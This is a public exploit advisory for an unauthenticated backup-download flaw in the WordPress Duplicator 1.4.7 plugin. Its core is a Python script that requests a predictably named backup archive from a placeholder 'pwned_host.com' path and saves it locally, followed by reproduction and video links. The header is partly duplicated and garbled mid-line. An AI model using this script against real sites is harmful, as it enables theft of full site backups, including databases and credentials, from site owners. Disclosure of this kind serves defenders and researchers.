Vulnerabilities

WordPress Duplicator 1.4.7 Unauthenticated Backup Download

## Title: WordPress Plugin Duplicator 1.4.7 - Unauthenticated Backup Download
## Author: nu11secur1ty
## Date: 08.03.2022
## Vendor: https://wordpress.org/
## Software: https://wor ## Title: WordPress Plugin Duplicator 1.4.7 - Unauthenticated Backup Download
## Author: nu11secur1ty
## Date: 08.03.2022
## Vendor: https://wordpress.org/
## Software: https://wordpress.org/plugins/duplicator/
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin



## Description:
The WordPress Plugin Duplicator 1.4.7 suffers from Unauthenticated
Backup Download.
The attacker can download all archive information from the system by
using this vulnerability!
Status: CRITICAL

[+] Exploit:

```mysql
#!/usr/bin/python
# Author nu11secur1ty
import requests
import time

vulnerableURL =
"http://pwned_host.com/wordpress/wp-content/backups-dup-lite/20220803_pwned_28dce10d86c575519304_20220803113819_archive.zip"
response = requests.get(vulnerableURL)
open("20220803_pwned_28dce10d86c575519304_20220803113819_archive.zip",
"wb").write(response.content)
time.sleep(5)
print("Right now, you just downloaded the secret archive =) ")


```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin)

## Proof and Exploit:
[href](https://streamable.com/n3osob)